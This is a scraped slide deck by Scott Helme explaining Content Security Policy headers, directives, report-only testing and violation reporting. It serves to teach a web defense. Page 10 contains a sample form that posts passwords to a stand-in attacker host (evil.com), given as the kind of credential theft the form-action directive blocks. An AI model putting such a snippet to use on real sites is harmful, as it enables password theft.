• Home

  • Technology

  • Content Security Policy - The application security Swiss Army Knife
16
Content Security Policy The application security Swiss Army Knife @Scott_Helme | scotthelme.co.uk Scott Helme

Content Security Policy - The application security Swiss Army Knife

Embed Size (px)

Citation preview

Page 1: Content Security Policy - The application security Swiss Army Knife

Content Security PolicyThe application security Swiss Army

Knife

@Scott_Helme | scotthelme.co.ukScott Helme

Page 2: Content Security Policy - The application security Swiss Army Knife

Browser support

Page 3: Content Security Policy - The application security Swiss Army Knife

What is CSP?

cache-control: max-age=0, no-cachecontent-encoding: gzipcontent-security-policy: [policy goes here]date: Fri, 22 Apr 2016 10:00:00 GMTserver: nginxstatus: 200

Page 4: Content Security Policy - The application security Swiss Army Knife

child-srcconnect-srcdefault-srcfont-srcframe-src*

CSP Directivesimg-srcmedia-srcobject-srcscript-srcstyle-src

* deprecated

Page 5: Content Security Policy - The application security Swiss Army Knife

A basic policy

Content-Security-Policy: default-src ‘self’ mycdn.com

Page 6: Content Security Policy - The application security Swiss Army Knife

Fine tuningContent-Security-Policy: default-src ‘self’; script-src ‘self’ cdnjs.cloudflare.com ajax.googleapis.com

<script src="https://ajax.googleapis.com/.../jquery.min.js"></script>

<script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js"></script>

Page 7: Content Security Policy - The application security Swiss Army Knife

Fine tuning

Content-Security-Policy: default-src ‘self’; script-src [source list];style-src [source list];img-src [source list];child-src [source list];

Page 8: Content Security Policy - The application security Swiss Army Knife

Mitigating XSS<script> var message = “Hello World!!!”; alert(message);</script>

<script src=“(scotthelme.co.uk)/js/message.js”></script>

Page 9: Content Security Policy - The application security Swiss Army Knife

form-actionframe-ancestors

Additional CSP Directives

block-all-mixed-contentupgrade-insecure-requests

Page 10: Content Security Policy - The application security Swiss Army Knife

form-actionframe-ancestors

Additional CSP Directives

block-all-mixed-contentupgrade-insecure-requests<form action=“https://evil.com/stealPassword.php”

method=“post”> ... </form>

Page 11: Content Security Policy - The application security Swiss Army Knife

form-actionframe-ancestors

Additional CSP Directives

block-all-mixed-contentupgrade-insecure-requests<iframe src=“https://scotthelme.co.uk/”>

</iframe>

Page 12: Content Security Policy - The application security Swiss Army Knife

form-actionframe-ancestors

Additional CSP Directives

block-all-mixed-contentupgrade-insecure-requests

<img src=“http://imgur.com/kittens.png/”>

Page 13: Content Security Policy - The application security Swiss Army Knife

Testing CSPContent-Security-Policy-Report-Only: [policy]

Page 14: Content Security Policy - The application security Swiss Army Knife

CSP ReportingContent-Security-Policy-Report-Only: [policy];report-uri https://scotthelme.report-uri.io

{ "csp-report": { "document-uri": "https://scotthelme.co.uk/ecdsa/", "violated-directive": “script-src ‘self’", "original-policy": “[policy here]", "blocked-uri": https://evil.com ...

Page 15: Content Security Policy - The application security Swiss Army Knife

Migrating from HTTP to HTTPS

Content-Security-Policy-Report-Only: default-src https:;report-uri https://scotthelme.report-uri.io

Page 16: Content Security Policy - The application security Swiss Army Knife

Thanks!

@Scott_Helme | scotthelme.co.ukScott Helme


Adobe Captivate: The Visual Swiss Army Knife

Adobe Captivate: The Visual Swiss Army Knife

Business
Swiss Army Knife of Content Marketing

Swiss Army Knife of Content Marketing

Social Media
Swiss army knife in cryptography and information security - cryptographic hash functions

Swiss army knife in cryptography and information security - cryptographic hash functions

Documents
What is the Best Swiss Army Knife

What is the Best Swiss Army Knife

Devices & Hardware
swiss knife 3/2015 (september)

swiss knife 3/2015 (september)

Documents
OPENSKY: A SWISS ARMY KNIFE FOR AIR TRAFFIC SECURITY RESEARCH - DASC 2015 - Paper.pdf · OPENSKY: A SWISS ARMY KNIFE FOR AIR TRAFFIC SECURITY RESEARCH Martin Strohmeier, Ivan Martinovic,

OPENSKY: A SWISS ARMY KNIFE FOR AIR TRAFFIC SECURITY RESEARCH - DASC 2015 - Paper.pdf · OPENSKY: A SWISS ARMY KNIFE FOR AIR TRAFFIC SECURITY RESEARCH Martin Strohmeier, Ivan Martinovic,

Documents
Employee Generated Content: HR’s Swiss Army Knife

Employee Generated Content: HR’s Swiss Army Knife

Business
Mongodb, our Swiss Army Knife Database

Mongodb, our Swiss Army Knife Database

Technology
Swiss Army Knife Scale Refinishing

Swiss Army Knife Scale Refinishing

Documents
Emacs - Professionals Swiss Army Knife

Emacs - Professionals Swiss Army Knife

Software
Swiss Knife, Outdoor & Accessories

Swiss Knife, Outdoor & Accessories

Documents
Process Builder: Your Salesforce Swiss Army Knife

Process Builder: Your Salesforce Swiss Army Knife

Technology
The Swiss Army Knife for Waste Management

The Swiss Army Knife for Waste Management

Documents
Jetpack: The Swiss Army Knife of Plugins

Jetpack: The Swiss Army Knife of Plugins

Education
David Rook Agnitio Security code review swiss army knife ...• Senior Security consultant, Sogeti Nederland BV, Nederland CISSP, OSCP, ASS and someotheracronyms ... • Structured,

David Rook Agnitio Security code review swiss army knife ...• Senior Security consultant, Sogeti Nederland BV, Nederland CISSP, OSCP, ASS and someotheracronyms ... • Structured,

Documents
Swiss army knife Spring

Swiss army knife Spring

Technology
Ansible - Swiss Army Knife Orchestration

Ansible - Swiss Army Knife Orchestration

Technology
Victorinox Swiss Army Knife

Victorinox Swiss Army Knife

Documents
DSP 'Swiss Army Knife

DSP 'Swiss Army Knife

Documents
swiss knife 1/2015 (mrz)

swiss knife 1/2015 (mrz)

Documents
Elastic the swiss army knife for Redbooth

Elastic the swiss army knife for Redbooth

Engineering
swiss knife 3/2014 (sept)

swiss knife 3/2014 (sept)

Documents
swiss knife 3/2015

swiss knife 3/2015

Documents
The Web Analytics Swiss Army Knife

The Web Analytics Swiss Army Knife

Marketing
Version 3 - HL7’s “Swiss Army Knife”

Version 3 - HL7’s “Swiss Army Knife”

Documents
Swiss Army Knife for Automation Testing

Swiss Army Knife for Automation Testing

Software
WLST: WebLogic's Swiss Army Knife

WLST: WebLogic's Swiss Army Knife

Technology
Swiss Army Knife Analysis

Swiss Army Knife Analysis

Documents
Swiss army-knife-analysis

Swiss army-knife-analysis

Entertainment & Humor
Analytics swiss army knife

Analytics swiss army knife

Internet